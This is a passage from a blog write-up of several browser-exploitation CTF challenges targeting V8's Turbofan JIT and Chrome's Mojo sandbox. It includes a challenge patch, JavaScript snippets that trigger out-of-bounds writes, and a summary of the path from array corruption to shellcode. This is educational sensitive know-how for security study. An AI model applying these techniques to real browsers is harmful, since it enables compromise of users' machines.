<p>Thanks to the comments, the bug is pretty obvious. Shrinking the array you are iterating over, in the iterator callback function, incorrectly changes the array length without resizing the backing store. There really wasn’t a lot different happening here than before - we can see the pattern already. Corrupt array length -> overwrite victim -> clobber function code pointer -> shellcode. Besides implementing the weaponization again, the main difference was getting used to the Chromium project’s bug-reporting and regression system.</p>
<h3 id="v9-34c3ctf">“V9” (34C3CTF)</h3>
<p>V9 represented a completely different direction from the previous browser challenges. It required an understanding of Chrome’s Turbofan JIT subsystem. This was an interesting opportunity to approach JIT bugs because the provided patchfile was quite small:</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">@@</span> <span class="o">-</span><span class="mi">26</span><span class="p">,</span><span class="mi">6</span> <span class="o">+</span><span class="mi">26</span><span class="p">,</span><span class="mi">7</span> <span class="err">@@</span> <span class="n">Reduction</span> <span class="n">RedundancyElimination</span><span class="o">::</span><span class="n">Reduce</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span> <span class="n">node</span><span class="p">)</span> <span class="p">{</span>
<span class="err">@@</span> <span class="o">-</span><span class="mi">167</span><span class="p">,</span><span class="mi">6</span> <span class="o">+</span><span class="mi">168</span><span class="p">,</span><span class="mi">15</span> <span class="err">@@</span> <span class="kt">bool</span> <span class="n">CheckSubsumes</span><span class="p">(</span><span class="n">Node</span> <span class="k">const</span><span class="o">*</span> <span class="n">a</span><span class="p">,</span> <span class="n">Node</span> <span class="k">const</span><span class="o">*</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
<span class="p">}</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">+</span> <span class="k">case</span> <span class="n">IrOpcode</span><span class="p">:</span><span class="o">:</span><span class="n">kCheckMaps</span><span class="o">:</span> <span class="p">{</span>
<span class="o">+</span> <span class="c1">// CheckMaps are compatible if the first checks a subset of the second.</span>
<span class="o">+</span> <span class="n">ZoneHandleSet</span><span class="o"><</span><span class="n">Map</span><span class="o">></span> <span class="k">const</span><span class="o">&</span> <span class="n">a_maps</span> <span class="o">=</span> <span class="n">CheckMapsParametersOf</span><span class="p">(</span><span class="n">a</span><span class="o">-></span><span class="n">op</span><span class="p">()).</span><span class="n">maps</span><span class="p">();</span>
<span class="o">+</span> <span class="n">ZoneHandleSet</span><span class="o"><</span><span class="n">Map</span><span class="o">></span> <span class="k">const</span><span class="o">&</span> <span class="n">b_maps</span> <span class="o">=</span> <span class="n">CheckMapsParametersOf</span><span class="p">(</span><span class="n">b</span><span class="o">-></span><span class="n">op</span><span class="p">()).</span><span class="n">maps</span><span class="p">();</span>
<span class="o">+</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">b_maps</span><span class="p">.</span><span class="n">contains</span><span class="p">(</span><span class="n">a_maps</span><span class="p">))</span> <span class="p">{</span>
<span class="o">+</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="o">+</span> <span class="p">}</span>
<span class="o">+</span> <span class="k">break</span><span class="p">;</span>
<span class="o">+</span> <span class="p">}</span>
</code></pre></div></div>
<p>The challenge adds a new opcode to the list of those removed by RedundancyElimination, which is a JIT pass responsible for removing redundant nodes in the sea-of-nodes representation. The pass itself is invoked during the “early optimization” and “load elimination” phases of the <a href="https://cs.chromium.org/chromium/src/v8/src/compiler/pipeline.cc">Turbofan pipeline</a>. We can visualize all Turbofan passes and node graphs using the <a href="https://github.com/thlorenz/turbolizer">Turbolizer</a> tool, also available in V8’s git repo. In this case, the added opcode removes a CheckMaps node if one child’s map is strictly a subset of the second. You can imagine that situation occurring with code like this:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">2.2</span><span class="p">,</span> <span class="mf">3.3</span><span class="p">,</span> <span class="mf">4.4</span><span class="p">];</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mf">5.5</span><span class="p">;</span> <span class="c1">// [A]</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">x</span><span class="p">);</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mf">6.6</span><span class="p">;</span> <span class="c1">// [B]</span>
</code></pre></div></div>
<p>At <code class="highlighter-rouge">[A]</code> and <code class="highlighter-rouge">[B]</code>, a <code class="highlighter-rouge">CheckMaps</code> is emitted to ensure that the <code class="highlighter-rouge">console.log(x)</code> call has not transitioned x’s underlying element map. Such a node might be emitted as a protection against an object changing from <code class="highlighter-rouge">PACKED_DOUBLE_ELEMENTS</code> to <code class="highlighter-rouge">DICTIONARY_MODE</code>, for example. However, the <code class="highlighter-rouge">Reduce()</code> is incorrect because it does not check exactly that; <code class="highlighter-rouge">x</code> will transition and the emitted fast access code will be incorrect. The following code will transition an Array in exactly that way (packed -> dictionary) resulting in OOB access:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.1</span><span class="p">];</span> <span class="c1">// declare a PACKED_DOUBLE_ELEMENTS</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mf">1.1</span><span class="p">;</span> <span class="c1">// inlined StoreElement, protected by CheckMaps</span>
<span class="nx">x</span><span class="p">.</span><span class="nx">len</span> <span class="o">=</span> <span class="mh">0x7f0000</span><span class="p">;</span> <span class="c1">// transition to DICTIONARY_MODE</span>
<span class="c1">// At this point, x is of type DICTIONARY_ELEMENTS, but the JIT thinks it is PACKED</span>
<span class="c1">// The following inlined StoreElement will incorrectly offset from the array, rather than</span>
<span class="c1">// resolving the looking with the Elements pointer</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="nx">val</span><span class="p">;</span>
</code></pre></div></div>
<h3 id="krautflare-35c3ctf">“krautflare” (35C3CTF)</h3>
<p>Much has been written about krautflare elsewhere online, including some excellent writeups (<a href="https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/">here</a> and <a href="https://www.jaybosamiya.com/blog/2019/01/02/krautflare/">here</a>). The key problem in this challenge is how to delay optimization in V8 until the <code class="highlighter-rouge">ConstantFoldingReducer</code> will no longer be invoked. Doing so prevents the typing bug, which could be induced to appear in an early typing stage, from being optimized out before it can be used to generate buggy code. In theory, the answer is straightforward - prevent V8 from performing type analysis until a later pass has removed some intermediate construct. One such example, which I and others used, involves forcing a delay until <a href="https://www.jfokus.se/jfokus18/preso/Escape-Analysis-in-V8.pdf">escape analysis</a>:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">diagonal</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">abs</span><span class="p">({</span><span class="na">x</span><span class="p">:</span><span class="nx">a</span><span class="p">,</span> <span class="na">y</span><span class="p">:</span><span class="nx">a</span><span class="p">});</span>
<span class="p">}</span>
<span class="c1">// After Escape Analysis...</span>
<span class="kd">function</span> <span class="nx">diagonal</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">sqrt</span><span class="p">(</span><span class="nx">a</span><span class="o">*</span><span class="nx">a</span> <span class="o">+</span> <span class="nx">a</span><span class="o">*</span><span class="nx">a</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>I didn’t solve this challenge during the competition. I knew I had to wait until escape analysis to prevent early optimization, but was having trouble triggering it during the CTF. In the end, through a combination of child functions and hiding arguments I got it to work - as a OOB write. For some reason, Turbofan was not removing the CheckBounds on my OOB read attempts, which I think may be related to a <code class="highlighter-rouge">Load</code> node not being inlined, whereas the <code class="highlighter-rouge">StoreElement</code> node was lowered to remove its internal bounds check.</p>
<p>One interesting thing to note is that constructions involving escaping object properties, like the following:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">x</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">}.</span><span class="nx">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">y</span> <span class="o">=</span> <span class="nx">x</span><span class="p">();</span>
</code></pre></div></div>
<p>…seem to be optimized during the “load elimination” stage if possible, right before “escape analysis”. Sufficient complexity or child functions will prevent that from happening. This means that contrary to the name of the phase, simple objects will undergo escape analysis optimization prior to the formal “escape analysis phase.” It’s also possible to prevent the “load elimination” phase from optimizing it by including a large number of class members (see <code class="highlighter-rouge">kMaxTrackedFields</code>, currently 32), which <a href="https://twitter.com/_tsuro">_tsuro</a> utilized in his reference solution.</p>
<h3 id="just-in-time-googlectf-finals-2018">“Just-in-time” (GoogleCTF Finals 2018)</h3>
<p>This challenge adds a small <code class="highlighter-rouge">Reducer</code> to the V8 pipeline, which is basically just a phase (like “dead code elimination”, or “load elimination” as we discussed above). The added buggy <code class="highlighter-rouge">DuplicateAdditionReducer</code> combines JSNumber operations with constant double values at JIT compile time. For example, expressions of the form <code class="highlighter-rouge">1.1 + (2.2 + 3.3)</code> would be converted to <code class="highlighter-rouge">1.1 + 5.5</code>. The combination was done by pulling out the underlying <code class="highlighter-rouge">double</code> value and adding them with C++ float semantics. Unfortunately, that doesn’t quite match JSNumber addition semantics. While most people online abused the fact that <code class="highlighter-rouge">Number.MAX-SAFE_INTEGER + 1 === Number.MAX-SAFE_INTEGER + 2</code>, solving krautflare right before this made me think of</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span><span class="kc">Infinity</span> <span class="o">+</span> <span class="nb">Number</span><span class="p">.</span><span class="nx">MAX_VALUE</span> <span class="o">+</span> <span class="nb">Number</span><span class="p">.</span><span class="nx">MAX_VALUE</span> <span class="o">==</span> <span class="o">-</span><span class="kc">Infinity</span>
</code></pre></div></div>
<p>which is correct. However, the <code class="highlighter-rouge">DuplicateAdditionReducer</code> combines the two into</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span><span class="kc">Infinity</span> <span class="o">+</span> <span class="kc">Infinity</span> <span class="o">==</span> <span class="kc">NaN</span>
</code></pre></div></div>
<p>which creates an observable typing bug. Afterwards, the problem actually reduces to that of krautflare, just substituting <code class="highlighter-rouge">Object.is(..., -0)</code> with <code class="highlighter-rouge">Object.is(..., NaN)</code>. In fact, my final buggy JITted function for this challenge is almost identical to my krautflare solution.</p>
<p>If you’re interested in reading more about this challenge, __x86 has a great post that dives deep into it <a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">here</a>.</p>
<h3 id="mr-mojo-rising-googlectf-finals-2018">“Mr. Mojo Rising” (GoogleCTF Finals 2018)</h3>
<p>After completing a series of renderer bugs, it seemed applicable to throw in at least one SBX challenge. This was a P0-discovered nday bug that allowed for relative r/w off of a Mojo datapipe, which are basically mmap’d shm regions in memory. The Mojo documentation is pretty sparse and I ended up having to spend a decent amount of time fiddling with ServiceWorkers to get things to play nice with headless chrome. Eventually, I was able to trigger the primitives and write straightline exploit code with <code class="highlighter-rouge">await</code>. Ultimately, this was my most brittle exploit - it’s heavily offset + allocation order dependent. I abuse the predictable ordering of mmap allocations to overwrite a function in libc’s GOT to point to the magic gadget, a classic CTF trick.</p>
<p>All that work for this, <a href="https://asciinema.org/a/7SqpxsaqlwqvMmydvBOkSI6Mp">an asciinema of it landing</a>.</p>
<h2 id="parting-thoughts">Parting Thoughts</h2>
<p>I had a lot of fun completing the above challenges and will definitely continue working on browser exploitation. While I’m not sure how I feel about the recent trend of “weaponize-nday-as-a-challenge” in CTF, the problems present easy environments to focus on weaponizing bugs in a straightforward way with more focus on the browser internals than any environment factors that might complicate things. At the very least, it’s definitely good practice!</p>
<p>You can find all my solution scripts (as well as collected challenge readmes+patchfiles) <a href="http://github.com/nafod/advent-browserpwn">here</a>.</p>Last December (2018), I created an advent calendar on the Japanese site adventar.org after seeing some Japanese CTFers creating a PWN-focused calendar there.